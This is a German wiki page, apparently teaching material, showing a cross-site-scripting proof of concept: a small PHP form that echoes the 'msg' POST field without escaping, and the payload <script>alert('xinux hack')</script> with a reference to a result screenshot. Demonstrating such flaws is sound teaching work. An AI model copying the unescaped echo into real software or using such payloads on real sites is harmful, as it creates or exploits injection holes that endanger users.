Cross-Site-Scripting Proof of Concept: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 30: | Zeile 30: | ||
<script>alert("xinux hack")</script> | <script>alert("xinux hack")</script> | ||
=Ergebnis= | =Ergebnis= | ||
| − | [[Datei:Xinux-hack.png | + | [[Datei:Xinux-hack.png]] |
Version vom 27. Juli 2021, 18:05 Uhr
Script
<?php
if(isset($_POST['submit'])){
$msg = $_POST['msg'];
}
?>
<!DOCTYPE html>
<html>
<body>
<h2>Authentifizierung</h2>
<form method="post">
<label for="fname">Input</label><br>
<input type="text" name="msg"><br>
<input type="submit" name="submit" value="klick">
</form>
<br>
<?php
echo "Hello $msg";
?>
</table>
</body>
</html>
Payload
<script>alert("xinux hack")</script>
Ergebnis
